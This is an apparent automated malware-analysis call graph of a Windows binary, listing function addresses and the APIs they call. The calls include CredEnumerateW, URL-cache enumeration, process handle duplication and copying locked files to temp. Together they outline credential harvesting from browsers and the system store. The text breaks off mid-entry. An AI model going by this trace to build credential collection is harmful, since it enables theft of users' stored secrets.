38210->38211 38212 402d59 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402d78 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402d93 38215->38216 38217 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38216->38217 38217->38100 38218->38090 38222 40b58d 38219->38222 38221 40b2d1 38221->38164 38223 40b5a4 GetModuleHandleW FindResourceW 38222->38223 38224 40b62e 38222->38224 38225 40b5c2 LoadResource 38223->38225 38227 40b5e7 38223->38227 38224->38221 38226 40b5d0 SizeofResource LockResource 38225->38226 38225->38227 38226->38227 38227->38224 38235 40afcf 38227->38235 38229 40b608 memcpy 38238 40b4d3 memcpy 38229->38238 38231 40b61e 38239 40b3c1 18 API calls 38231->38239 38233 40b626 38240 40b04b 38233->38240 38236 40b04b ??3@YAXPAX 38235->38236 38237 40afd7 ??2@YAPAXI 38236->38237 38237->38229 38238->38231 38239->38233 38241 40b051 ??3@YAXPAX 38240->38241 38242 40b05f 38240->38242 38241->38242 38242->38224 38243->38108 38245 4032c4 38244->38245 38246 40b633 free 38245->38246 38247 403316 38246->38247 38266 44553b 38247->38266 38251 403480 38464 40368c 15 API calls 38251->38464 38253 403489 38254 40b633 free 38253->38254 38256 403495 38254->38256 38255 40333c 38255->38251 38257 4033a9 memset memcpy 38255->38257 38258 4033ec wcscmp 38255->38258 38462 4028e7 11 API calls 38255->38462 38463 40f508 6 API calls 38255->38463 38256->38110 38257->38255 38257->38258 38258->38255 38261 403421 _wcsicmp 38261->38255 38263 444a64 FreeLibrary 38262->38263 38264 444a83 38262->38264 38263->38264 38264->38110 38265->38111 38267 445548 38266->38267 38268 445599 38267->38268 38465 40c768 38267->38465 38269 4455a8 memset 38268->38269 38276 4457f2 38268->38276 38548 403988 38269->38548 38279 445854 38276->38279 38650 403e2d memset memset memset memset memset 38276->38650 38277 4455e5 38288 445672 38277->38288 38293 44560f 38277->38293 38278 4458bb memset memset 38281 414c2e 17 API calls 38278->38281 38332 4458aa 38279->38332 38673 403c9c memset memset memset memset memset 38279->38673 38284 4458f9 38281->38284 38283 44595e memset memset 38291 414c2e 17 API calls 38283->38291 38292 40b2cc 27 API calls 38284->38292 38286 44558c 38532 444b06 38286->38532 38287 44557a 38287->38286 38746 4136c0 CoTaskMemFree 38287->38746 38559 403fbe memset memset memset memset memset 38288->38559 38289 445a00 memset memset 38696 414c2e 38289->38696 38290 445b22 38296 445bca 38290->38296 38297 445b38 memset memset memset 38290->38297 38301 44599c 38291->38301 38303 445909 38292->38303 38305 4087b3 338 API calls 38293->38305 38295 445849 38762 40b1ab free free 38295->38762 38304 445c8b memset memset 38296->38304 38370 445cf0 38296->38370 38308 445bd4 38297->38308 38309 445b98 38297->38309 38302 40b2cc 27 API calls 38301->38302 38316 4459ac 38302->38316 38313 409d1f 6 API calls 38303->38313 38317 414c2e 17 API calls 38304->38317 38314 445621 38305->38314 38306 44589f 38763 40b1ab free free 38306->38763 38307 445585 38747 41366b FreeLibrary 38307->38747 38323 414c2e 17 API calls 38308->38323 38309->38308 38319 445ba2 38309->38319 38312 403335 38461 4452e5 45 API calls 38312->38461 38327 445919 38313->38327 38748 4454bf 20 API calls 38314->38748 38315 445823 38315->38295 38337 4087b3 338 API calls 38315->38337 38328 409d1f 6 API calls 38316->38328 38329 445cc9 38317->38329 38835 4099c6 wcslen 38319->38835 38320 4456b2 38750 40b1ab free free 38320->38750 38322 40b2cc 27 API calls 38333 445a4f 38322->38333 38324 445be2 38323->38324 38335 40b2cc 27 API calls 38324->38335 38325 445d3d 38355 40b2cc 27 API calls 38325->38355 38326 445d88 memset memset memset 38338 414c2e 17 API calls 38326->38338 38764 409b98 GetFileAttributesW 38327->38764 38339 4459bc 38328->38339 38340 409d1f 6 API calls 38329->38340 38330 445879 38330->38306 38351 4087b3 338 API calls 38330->38351 38332->38278 38356 44594a 38332->38356 38712 409d1f wcslen wcslen 38333->38712 38345 445bf3 38335->38345 38337->38315 38348 445dde 38338->38348 38831 409b98 GetFileAttributesW 38339->38831 38350 445ce1 38340->38350 38341 445bb3 38838 445403 memset 38341->38838 38342 445680 38342->38320 38582 4087b3 memset 38342->38582 38354 409d1f 6 API calls 38345->38354 38346 445928 38346->38356 38765 40b6ef 38346->38765 38357 40b2cc 27 API calls 38348->38357 38855 409b98 GetFileAttributesW 38350->38855 38351->38330 38353 40b2cc 27 API calls 38362 445a94 38353->38362 38364 445c07 38354->38364 38365 445d54 _wcsicmp 38355->38365 38356->38283 38369 4459ed 38356->38369 38368 445def 38357->38368 38358 4459cb 38358->38369 38378 40b6ef 253 API calls 38358->38378 38717 40ae18 38362->38717 38363 44566d 38363->38276 38633 413d4c 38363->38633 38374 445389 259 API calls 38364->38374 38375 445d71 38365->38375 38438 445d67 38365->38438 38367 445665 38749 40b1ab free free 38367->38749 38376 409d1f 6 API calls 38368->38376 38369->38289 38369->38290 38370->38312 38370->38325 38370->38326 38371 445389 259 API calls 38371->38296 38380 445c17 38374->38380 38856 445093 23 API calls 38375->38856 38383 445e03 38376->38383 38378->38369 38379 4456d8 38385 40b2cc 27 API calls 38379->38385 38386 40b2cc 27 API calls 38380->38386 38382 44563c 38382->38367 38388 4087b3 338 API calls 38382->38388 38857 409b98 GetFileAttributesW 38383->38857 38384 40b6ef 253 API calls 38384->38312 38390 4456e2 38385->38390 38391 445c23 38386->38391 38387 445d83 38387->38312 38388->38382 38751 413fa6 _wcsicmp _wcsicmp 38390->38751 38395 409d1f 6 API calls 38391->38395 38393 445e12 38400 445e6b 38393->38400 38407 40b2cc 27 API calls 38393->38407 38398 445c37 38395->38398 38396 445aa1 38399 445b17 38396->38399 38414 445ab2 memset 38396->38414 38427 409d1f 6 API calls 38396->38427 38724 40add4 38396->38724 38729 445389 38396->38729 38738 40ae51 38396->38738 38397 4456eb 38403 4456fd memset memset memset memset 38397->38403 38404 4457ea 38397->38404 38405 445389 259 API calls 38398->38405 38832 40aebe 38399->38832 38859 445093 23 API calls 38400->38859 38752 409c70 wcscpy wcsrchr 38403->38752 38755 413d29 38404->38755 38410 445c47 38405->38410 38411 445e33 38407->38411 38408 445e7e 38413 445f67 38408->38413 38416 40b2cc 27 API calls 38410->38416 38417 409d1f 6 API calls 38411->38417 38422 40b2cc 27 API calls 38413->38422 38418 40b2cc 27 API calls 38414->38418 38420 445c53 38416->38420 38421 445e47 38417->38421 38418->38396 38419 409c70 2 API calls 38423 44577e 38419->38423 38424 409d1f 6 API calls 38420->38424 38858 409b98 GetFileAttributesW 38421->38858 38426 445f73 38422->38426 38428 409c70 2 API calls 38423->38428 38429 445c67 38424->38429 38431 409d1f 6 API calls 38426->38431 38427->38396 38432 44578d 38428->38432 38433 445389 259 API calls 38429->38433 38430 445e56 38430->38400 38436 445e83 memset 38430->38436 38434 445f87 38431->38434 38432->38404 38440 40b2cc 27 API calls 38432->38440 38433->38296 38862 409b98 GetFileAttributesW 38434->38862 38439 40b2cc 27 API calls 38436->38439 38438->38312 38438->38384 38441 445eab 38439->38441 38442 4457a8 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 445ebf 38443->38445 38446 4457b8 38444->38446 38447 40ae18 9 API calls 38445->38447 38754 409b98 GetFileAttributesW 38446->38754 38457 445ef5 38447->38457 38449 4457c7 38449->38404 38451 4087b3 338 API calls 38449->38451 38450 40ae51 9 API calls 38450->38457 38451->38404 38452 445f5c 38454 40aebe FindClose 38452->38454 38453 40add4 2 API calls 38453->38457 38454->38413 38455 40b2cc 27 API calls 38455->38457 38456 409d1f 6 API calls 38456->38457 38457->38450 38457->38452 38457->38453 38457->38455 38457->38456 38459 445f3a 38457->38459 38860 409b98 GetFileAttributesW 38457->38860 38861 445093 23 API calls 38459->38861 38461->38255 38462->38261 38463->38255 38464->38253 38466 40c775 38465->38466 38863 40b1ab free free 38466->38863 38468 40c788 38864 40b1ab free free 38468->38864 38470 40c790 38865 40b1ab free free 38470->38865 38472 40c798 38473 40aa04 free 38472->38473 38474 40c7a0 38473->38474 38866 40c274 memset 38474->38866 38479 40a8ab 9 API calls 38480 40c7c3 38479->38480 38481 40a8ab 9 API calls 38480->38481 38482 40c7d0 38481->38482 38895 40c3c3 38482->38895 38486 40c877 38495 40bdb0 38486->38495 38487 40c86c 38937 4053fe 39 API calls 38487->38937 38493 40c7e5 38493->38486 38493->38487 38494 40c634 50 API calls 38493->38494 38920 40a706 38493->38920 38494->38493 39200 404363 38495->39200 38498 40bf5d 39220 40440c 38498->39220 38499 40bdee 38499->38498 38503 40b2cc 27 API calls 38499->38503 38500 40bddf CredEnumerateW 38500->38499 38504 40be02 wcslen 38503->38504 38504->38498 38511 40be1e 38504->38511 38505 40be26 wcsncmp 38505->38511 38508 40be7d memset 38509 40bea7 memcpy 38508->38509 38508->38511 38510 40bf11 wcschr 38509->38510 38509->38511 38510->38511 38511->38498 38511->38505 38511->38508 38511->38509 38511->38510 38512 40b2cc 27 API calls 38511->38512 38514 40bf43 LocalFree 38511->38514 39223 40bd5d 28 API calls 38511->39223 39224 404423 38511->39224 38513 40bef6 _wcsnicmp 38512->38513 38513->38510 38513->38511 38514->38511 38515 4135f7 39239 4135e0 38515->39239 38518 40b2cc 27 API calls 38519 41360d 38518->38519 38520 40a804 8 API calls 38519->38520 38521 413613 38520->38521 38522 41361b 38521->38522 38523 41363e 38521->38523 38524 40b273 27 API calls 38522->38524 38525 4135e0 FreeLibrary 38523->38525 38526 413625 GetProcAddress 38524->38526 38527 413643 38525->38527 38526->38523 38528 413648 38526->38528 38527->38287 38529 413658 38528->38529 38530 4135e0 FreeLibrary 38528->38530 38529->38287 38531 413666 38530->38531 38531->38287 39242 4449b9 38532->39242 38535 444c1f 38535->38268 38536 4449b9 42 API calls 38538 444b4b 38536->38538 38537 444c15 38540 4449b9 42 API calls 38537->38540 38538->38537 39263 444972 GetVersionExW 38538->39263 38540->38535 38541 444b99 memcmp 38546 444b8c 38541->38546 38542 444c0b 39267 444a85 42 API calls 38542->39267 38546->38541 38546->38542 39264 444aa5 42 API calls 38546->39264 39265 40a7a0 GetVersionExW 38546->39265 39266 444a85 42 API calls 38546->39266 38549 40399d 38548->38549 39268 403a16 38549->39268 38551 403a09 39282 40b1ab free free 38551->39282 38553 403a12 wcsrchr 38553->38277 38554 4039a3 38554->38551 38557 4039f4 38554->38557 39279 40a02c CreateFileW 38554->39279 38557->38551 38558 4099c6 2 API calls 38557->38558 38558->38551 38560 414c2e 17 API calls 38559->38560 38561 404048 38560->38561 38562 414c2e 17 API calls 38561->38562 38563 404056 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 404073 38564->38565 38566 409d1f 6 API calls 38565->38566 38567 40408e 38566->38567 38568 409d1f 6 API calls 38567->38568 38569 4040a6 38568->38569 38570 403af5 20 API calls 38569->38570 38571 4040ba 38570->38571 38572 403af5 20 API calls 38571->38572 38573 4040cb 38572->38573 39309 40414f memset 38573->39309 38575 404140 39323 40b1ab free free 38575->39323 38576 4040ec memset 38580 4040e0 38576->38580 38578 404148 38578->38342 38579 4099c6 2 API calls 38579->38580 38580->38575 38580->38576 38580->38579 38581 40a8ab 9 API calls 38580->38581 38581->38580 39336 40a6e6 WideCharToMultiByte 38582->39336 38584 4087ed 39337 4095d9 memset 38584->39337 38587 408809 memset memset memset memset memset 38588 40b2cc 27 API calls 38587->38588 38589 4088a1 38588->38589 38590 409d1f 6 API calls 38589->38590 38591 4088b1 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 4088c0 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 4088d0 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 4088df 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 4088ef 38598->38599 38600 40b2cc 27 API calls 38599->38600 38601 4088fe 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 40890e 38602->38603 38604 40b2cc 27 API calls 38603->38604 38605 40891d 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 40892d 38606->38607 39356 409b98 GetFileAttributesW 38607->39356 38609 40893e 38610 408943 38609->38610 38611 408958 38609->38611 38614 408953 38614->38342 38634 40b633 free 38633->38634 38635 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38634->38635 38636 413f00 Process32NextW 38635->38636 38637 413da5 OpenProcess 38636->38637 38638 413f17 CloseHandle 38636->38638 38639 413eb0 38637->38639 38640 413df3 memset 38637->38640 38638->38379 38639->38636 38642 413ebf free 38639->38642 38643 4099f4 3 API calls 38639->38643 39780 413f27 38640->39780 38642->38639 38643->38639 38644 413e1f 38645 413e37 GetModuleHandleW 38644->38645 39785 413959 38644->39785 39801 413ca4 38644->39801 38645->38644 38647 413e46 GetProcAddress 38645->38647 38647->38644 38649 413ea2 CloseHandle 38649->38639 38651 414c2e 17 API calls 38650->38651 38652 403eb7 38651->38652 38653 414c2e 17 API calls 38652->38653 38654 403ec5 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403ee2 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403efd 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 403f15 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403f29 38661->38662 38663 403af5 20 API calls 38662->38663 38664 403f3a 38663->38664 38665 40414f 33 API calls 38664->38665 38671 403f4f 38665->38671 38666 403faf 39815 40b1ab free free 38666->39815 38668 403f5b memset 38668->38671 38669 403fb7 38669->38315 38670 4099c6 2 API calls 38670->38671 38671->38666 38671->38668 38671->38670 38672 40a8ab 9 API calls 38671->38672 38672->38671 38674 414c2e 17 API calls 38673->38674 38675 403d26 38674->38675 38676 414c2e 17 API calls 38675->38676 38677 403d34 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d51 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403d6c 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403d84 38682->38683 38684 403af5 20 API calls 38683->38684 38685 403d98 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403da9 38686->38687 38688 40414f 33 API calls 38687->38688 38689 403dbe 38688->38689 38690 403e1e 38689->38690 38692 403dca memset 38689->38692 38694 4099c6 2 API calls 38689->38694 38695 40a8ab 9 API calls 38689->38695 39816 40b1ab free free 38690->39816 38692->38689 38693 403e26 38693->38330 38694->38689 38695->38689 38697 414b81 9 API calls 38696->38697 38699 414c40 38697->38699 38698 414c73 memset 38701 414c94 38698->38701 38699->38698 39817 409cea 38699->39817 39820 414592 RegOpenKeyExW 38701->39820 38704 414c64 SHGetSpecialFolderPathW 38706 414d0b 38704->38706 38705 414cc1 38707 414cf4 wcscpy 38705->38707 39821 414bb0 wcscpy 38705->39821 38706->38322 38707->38706 38709 414cd2 39822 4145ac RegQueryValueExW 38709->39822 38711 414ce9 RegCloseKey 38711->38707 38713 409d62 38712->38713 38714 409d43 wcscpy 38712->38714 38713->38353 38715 409719 2 API calls 38714->38715 38716 409d51 wcscat 38715->38716 38716->38713 38718 40aebe FindClose 38717->38718 38719 40ae21 38718->38719 38720 4099c6 2 API calls 38719->38720 38721 40ae35 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 40ae49 38722->38723 38723->38396 38725 40ade0 38724->38725 38728 40ae0f 38724->38728 38726 40ade7 wcscmp 38725->38726 38725->38728 38727 40adfe wcscmp 38726->38727 38726->38728 38727->38728 38728->38396 38730 40ae18 9 API calls 38729->38730 38731 4453c4 38730->38731 38732 40ae51 9 API calls 38731->38732 38733 4453f3 38731->38733 38734 40add4 2 API calls 38731->38734 38737 445403 254 API calls 38731->38737 38732->38731 38735 40aebe FindClose 38733->38735 38734->38731 38736 4453fe 38735->38736 38736->38396 38737->38731 38739 40ae7b FindNextFileW 38738->38739 38740 40ae5c FindFirstFileW 38738->38740 38741 40ae94 38739->38741 38742 40ae8f 38739->38742 38740->38741 38744 40aeb6 38741->38744 38745 409d1f 6 API calls 38741->38745 38743 40aebe FindClose 38742->38743 38743->38741 38744->38396 38745->38744 38746->38307 38747->38286 38748->38382 38749->38363 38750->38363 38751->38397 38753 409c89 38752->38753 38753->38419 38754->38449 38756 413d39 38755->38756 38757 413d2f FreeLibrary 38755->38757 38758 40b633 free 38756->38758 38757->38756 38759 413d42 38758->38759 38760 40b633 free 38759->38760 38761 413d4a 38760->38761 38761->38276 38762->38279 38763->38332 38764->38346 38766 44db70 38765->38766 38767 40b6fc memset 38766->38767 38768 409c70 2 API calls 38767->38768 38769 40b732 wcsrchr 38768->38769 38770 40b743 38769->38770 38771 40b746 memset 38769->38771 38770->38771 38772 40b2cc 27 API calls 38771->38772 38773 40b76f 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 40b783 38774->38775 39823 409b98 GetFileAttributesW 38775->39823 38777 40b792 38778 40b7c2 38777->38778 38779 409c70 2 API calls 38777->38779 39824 40bb98 38778->39824 38781 40b7a5 38779->38781 38783 40b2cc 27 API calls 38781->38783 38787 40b7b2 38783->38787 38784 40b837 CloseHandle 38786 40b83e memset 38784->38786 38785 40b817 38788 409a45 3 API calls 38785->38788 39857 40a6e6 WideCharToMultiByte 38786->39857 38790 409d1f 6 API calls 38787->38790 38791 40b827 CopyFileW 38788->38791 38790->38778 38791->38786 38792 40b866 38793 444432 121 API calls 38792->38793 38794 40b879 38793->38794 38795 40bad5 38794->38795 38796 40b273 27 API calls 38794->38796 38797 40baeb 38795->38797 38798 40bade DeleteFileW 38795->38798 38799 40b89a 38796->38799 38800 40b04b ??3@YAXPAX 38797->38800 38798->38797 38801 438552 134 API calls 38799->38801 38802 40baf3 38800->38802 38803 40b8a4 38801->38803 38802->38356 38804 40bacd 38803->38804 38806 4251c4 137 API calls 38803->38806 38805 443d90 111 API calls 38804->38805 38805->38795 38829 40b8b8 38806->38829 38807 40bac6 39867 424f26 123 API calls 38807->39867 38808 40b8bd memset 39858 425413 17 API calls 38808->39858 38811 425413 17 API calls 38811->38829 38814 40a71b MultiByteToWideChar 38814->38829 38815 40a734 MultiByteToWideChar 38815->38829 38818 40b9b5 memcmp 38818->38829 38819 4099c6 2 API calls 38819->38829 38820 404423 38 API calls 38820->38829 38823 40bb3e memset memcpy 39868 40a734 MultiByteToWideChar 38823->39868 38824 4251c4 137 API calls 38824->38829 38826 40bb88 LocalFree 38826->38829 38829->38807 38829->38808 38829->38811 38829->38814 38829->38815 38829->38818 38829->38819 38829->38820 38829->38823 38829->38824 38830 40ba5f memcmp 38829->38830 39859 4253ef 16 API calls 38829->39859 39860 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38829->39860 39861 4253af 17 API calls 38829->39861 39862 4253cf 17 API calls 38829->39862 39863 447280 memset 38829->39863 39864 447960 memset memcpy memcpy memcpy 38829->39864 39865 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38829->39865 39866 447920 memcpy memcpy memcpy 38829->39866 38830->38829 38831->38358 38833 40aed1 38832->38833 38834 40aec7 FindClose 38832->38834 38833->38290 38834->38833 38836 4099d7 38835->38836 38837 4099da memcpy 38835->38837 38836->38837 38837->38341 38839 40b2cc 27 API calls 38838->38839 38840 44543f 38839->38840 38841 409d1f 6 API calls 38840->38841 38842 44544f 38841->38842 39956 409b98 GetFileAttributesW 38842->39956 38844 44545e 38845 445476 38844->38845 38846 40b6ef 253 API calls 38844->38846 38847 40b2cc 27 API calls 38845->38847 38846->38845 38848 445482 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 445492 38849->38850 39957 409b98 GetFileAttributesW 38850->39957 38852 4454a1 38853 4454b9 38852->38853 38854 40b6ef 253 API calls 38852->38854 38853->38371 38854->38853 38855->38370 38856->38387 38857->38393 38858->38430 38859->38408 38860->38457 38861->38457 38862->38438 38863->38468 38864->38470 38865->38472 38867 414c2e 17 API calls 38866->38867 38868 40c2ae 38867->38868 38938 40c1d3 38868->38938 38873 40c3be 38890 40a8ab 38873->38890 38874 40afcf 2 API calls 38875 40c2fd FindFirstUrlCacheEntryW 38874->38875 38876 40c3b6 38875->38876 38877 40c31e wcschr 38875->38877 38878 40b04b ??3@YAXPAX 38876->38878 38879 40c331 38877->38879 38880 40c35e FindNextUrlCacheEntryW 38877->38880 38878->38873 38882 40a8ab 9 API calls 38879->38882 38880->38877 38881 40c373 GetLastError 38880->38881 38883 40c3ad FindCloseUrlCache 38881->38883 38884 40c37e 38881->38884 38885 40c33e wcschr 38882->38885 38883->38876 38886 40afcf 2 API calls 38884->38886 38885->38880 38887 40c34f 38885->38887 38888 40c391 FindNextUrlCacheEntryW 38886->38888 38889 40a8ab 9 API calls 38887->38889 38888->38877 38888->38883 38889->38880 39127 40a97a 38890->39127 38893 40a8cc 38893->38479 38894 40a8d0 7 API calls 38894->38893 39132 40b1ab free free 38895->39132 38897 40c3dd 38898 40b2cc 27 API calls 38897->38898 38899 40c3e7 38898->38899 39133 414592 RegOpenKeyExW 38899->39133 38901 40c3f4 38902 40c50e 38901->38902 38903 40c3ff 38901->38903 38917 405337 38902->38917 38904 40a9ce 4 API calls 38903->38904 38905 40c418 memset 38904->38905 39134 40aa1d 38905->39134 38908 40c471 38910 40c47a _wcsupr 38908->38910 38909 40c505 RegCloseKey 38909->38902 38911 40a8d0 7 API calls 38910->38911 38912 40c498 38911->38912 38913 40a8d0 7 API calls 38912->38913 38914 40c4ac memset 38913->38914 38915 40aa1d 38914->38915 38916 40c4e4 RegEnumValueW 38915->38916 38916->38909 38916->38910 39136 405220 38917->39136 38921 4099c6 2 API calls 38920->38921 38922 40a714 _wcslwr 38921->38922 38923 40c634 38922->38923 39193 405361 38923->39193 38926 40c65c wcslen 39196 4053b6 39 API calls 38926->39196 38927 40c71d wcslen 38927->38493 38929 40c677 38930 40c713 38929->38930 39197 40538b 39 API calls 38929->39197 39199 4053df 39 API calls 38930->39199 38933 40c6a5 38933->38930 38934 40c6a9 memset 38933->38934 38935 40c6d3 38934->38935 39198 40c589 44 API calls 38935->39198 38937->38486 38939 40ae18 9 API calls 38938->38939 38945 40c210 38939->38945 38940 40ae51 9 API calls 38940->38945 38941 40c264 38942 40aebe FindClose 38941->38942 38944 40c26f 38942->38944 38943 40add4 2 API calls 38943->38945 38950 40e5ed memset memset 38944->38950 38945->38940 38945->38941 38945->38943 38946 40c231 _wcsicmp 38945->38946 38947 40c1d3 35 API calls 38945->38947 38946->38945 38948 40c248 38946->38948 38947->38945 38963 40c084 22 API calls 38948->38963 38951 414c2e 17 API calls 38950->38951 38952 40e63f 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40e658 38953->38954 38964 409b98 GetFileAttributesW 38954->38964 38956 40e667 38957 40e680 38956->38957 38958 409d1f 6 API calls 38956->38958 38965 409b98 GetFileAttributesW 38957->38965 38958->38957 38960 40e68f 38961 40c2d8 38960->38961 38966 40e4b2 38960->38966 38961->38873 38961->38874 38963->38945 38964->38956 38965->38960 38987 40e01e 38966->38987 38968 40e593 38969 40e5b0 38968->38969 38970 40e59c DeleteFileW 38968->38970 38971 40b04b ??3@YAXPAX 38969->38971 38970->38969 38973 40e5bb 38971->38973 38972 40e521 38972->38968 39010 40e175 38972->39010 38975 40e5c4 CloseHandle 38973->38975 38976 40e5cc 38973->38976 38975->38976 38978 40b633 free 38976->38978 38977 40e573 38979 40e584 38977->38979 38980 40e57c CloseHandle 38977->38980 38981 40e5db 38978->38981 39053 40b1ab free free 38979->39053 38980->38979 38984 40b633 free 38981->38984 38983 40e540 38983->38977 39030 40e2ab 38983->39030 38985 40e5e3 38984->38985 38985->38961 39054 406214 38987->39054 38990 40e16b 38990->38972 38993 40afcf 2 API calls 38994 40e08d OpenProcess 38993->38994 38995 40e0a4 GetCurrentProcess DuplicateHandle 38994->38995 38999 40e152 38994->38999 38996 40e0d0 GetFileSize 38995->38996 38997 40e14a CloseHandle 38995->38997 39090 409a45 GetTempPathW 38996->39090 38997->38999 38998 40e160 39002 40b04b ??3@YAXPAX 38998->39002 38999->38998 39001 406214 22 API calls 38999->39001 39001->38998 39002->38990 39003 40e0ea 39093 4096dc CreateFileW 39003->39093 39005 40e0f1 CreateFileMappingW 39006 40e140 CloseHandle CloseHandle 39005->39006 39007 40e10b MapViewOfFile 39005->39007 39006->38997 39008 40e13b CloseHandle 39007->39008 39009 40e11f WriteFile UnmapViewOfFile 39007->39009 39008->39006 39009->39008 39011 40e18c 39010->39011 39094 406b90 39011->39094 39014 40e1a7 memset 39020 40e1e8 39014->39020 39015 40e299 39104 4069a3 39015->39104 39021 40e283 39020->39021 39022 40dd50 _wcsicmp 39020->39022 39028 40e244 _snwprintf 39020->39028 39111 406e8f 13 API calls 39020->39111 39112 40742e 8 API calls 39020->39112 39113 40aae3 wcslen wcslen _memicmp 39020->39113 39114 406b53 SetFilePointerEx ReadFile 39020->39114 39023 40e291 39021->39023 39024 40e288 free 39021->39024 39022->39020 39025 40aa04 free 39023->39025 39024->39023 39025->39015 39029 40a8d0 7 API calls 39028->39029 39029->39020 39031 40e2c2 39030->39031 39032 406b90 11 API calls 39031->39032 39038 40e2d3 39032->39038 39033 40e4a0 39034 4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38983 39038->39033 39039 40e489 39038->39039 39042 40dd50 _wcsicmp 39038->39042 39048 40e3e0 memcpy 39038->39048 39049 40e3fb memcpy 39038->39049 39050 40e3b3 wcschr 39038->39050 39051 40e416 memcpy 39038->39051 39052 40e431 memcpy 39038->39052 39115 406e8f 13 API calls 39038->39115 39116 40dd50 _wcsicmp 39038->39116 39125 40742e 8 API calls 39038->39125 39126 406b53 SetFilePointerEx ReadFile 39038->39126 39040 40aa04 free 39039->39040 39041 40e491 39040->39041 39041->39033 39043 40e497 free 39041->39043 39042->39038 39043->39033 39045 40e376 memset 39117 40aa29 39045->39117 39048->39038 39049->39038 39050->39038 39051->39038 39052->39038 39053->38968 39055 406294 CloseHandle 39054->39055 39056 406224 39055->39056 39057 4096c3 CreateFileW 39056->39057 39058 40622d 39057->39058 39059 406281 GetLastError 39058->39059 39060 40a2ef ReadFile 39058->39060 39064 40625a 39059->39064 39061 406244 39060->39061 39061->39059 39062 40624b 39061->39062 39063 406777 19 API calls 39062->39063 39062->39064 39063->39064 39064->38990 39065 40dd85 memset 39064->39065 39066 409bca GetModuleFileNameW 39065->39066 39067 40ddbe CreateFileW 39066->39067 39070 40ddf1 39067->39070 39068 40afcf ??2@YAPAXI ??3@YAXPAX 39068->39070 39069 41352f 9 API calls 39069->39070 39070->39068 39070->39069 39071 40de0b NtQuerySystemInformation 39070->39071 39072 40de3b CloseHandle GetCurrentProcessId 39070->39072 39071->39070 39073 40de54 39072->39073 39074 413d4c 46 API calls 39073->39074 39082 40de88 39074->39082 39075 40e00c 39076 413d29 free FreeLibrary 39075->39076 39077 40e014 39076->39077 39077->38990 39077->38993 39078 40dea9 _wcsicmp 39079 40dee7 OpenProcess 39078->39079 39080 40debd _wcsicmp 39078->39080 39079->39082 39080->39079 39081 40ded0 _wcsicmp 39080->39081 39081->39079 39081->39082 39082->39075 39082->39078 39083 40dfef CloseHandle 39082->39083 39084 40df78 39082->39084 39085 40df23 GetCurrentProcess DuplicateHandle 39082->39085 39088 40df8f CloseHandle 39082->39088 39083->39082 39084->39083 39084->39088 39089 40dfae _wcsicmp 39084->39089 39085->39082 39086 40df4c memset 39085->39086 39087 41352f 9 API calls 39086->39087 39087->39082 39088->39084 39089->39082 39089->39084 39091 409a74 GetTempFileNameW 39090->39091 39092 409a66 GetWindowsDirectoryW 39090->39092 39091->39003 39092->39091 39093->39005 39095 406bd5 39094->39095 39096 406bad 39094->39096 39098 4066bf free malloc memcpy free free 39095->39098 39103 406c0f 39095->39103 39096->39095 39097 406bba _wcsicmp 39096->39097 39097->39095 39097->39096 39099 406be5 39098->39099 39100 40afcf ??2@YAPAXI ??3@YAXPAX 39099->39100 39099->39103 39101 406bff 39100->39101 39102 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39101->39102 39102->39103 39103->39014 39103->39015 39105 4069c4 ??3@YAXPAX 39104->39105 39106 4069af 39105->39106 39107 40b633 free 39106->39107 39108 4069ba 39107->39108 39109 40b04b ??3@YAXPAX 39108->39109 39110 4069c2 39109->39110 39110->38983 39111->39020 39112->39020 39113->39020 39114->39020 39115->39038 39116->39045 39118 40aa33 39117->39118 39119 40aa63 39117->39119 39120 40aa44 39118->39120 39121 40aa38 wcslen 39118->39121 39119->39038 39122 40a9ce malloc memcpy free free 39120->39122 39121->39120 39123 40aa4d 39122->39123 39123->39119 39124 40aa51 memcpy 39123->39124 39124->39119 39125->39038 39126->39038 39128 40a980 39127->39128 39129 40a8bb 39128->39129 39130 40a995 _wcsicmp 39128->39130 39131 40a99c wcscmp 39128->39131 39129->38893 39129->38894 39130->39128 39131->39128 39132->38897 39133->38901 39135 40aa23 RegEnumValueW 39134->39135 39135->38908 39135->38909 39137 405335 39136->39137 39138 40522a 39136->39138 39137->38493 39139 40b2cc 27 API calls 39138->39139 39140 405234 39139->39140 39141 40a804 8 API calls 39140->39141 39142 40523a 39141->39142 39181 40b273 39142->39181 39144 405248 _mbscpy _mbscat GetProcAddress 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39184 405211 GetProcAddress 39146->39184 39148 405282 39149 40b273 27 API calls 39148->39149 39150 40528f 39149->39150 39185 405211 GetProcAddress 39150->39185 39152 405298 39153 40b273 27 API calls 39152->39153 39154 4052a5 39153->39154 39186 405211 GetProcAddress 39154->39186 39156 4052ae 39157 40b273 27 API calls 39156->39157 39158 4052bb 39157->39158 39187 405211 GetProcAddress 39158->39187 39160 4052c4 39161 40b273 27 API calls 39160->39161 39162 4052d1 39161->39162 39188 405211 GetProcAddress 39162->39188 39164 4052da 39165 40b273 27 API calls 39164->39165 39166 4052e7 39165->39166 39189 405211 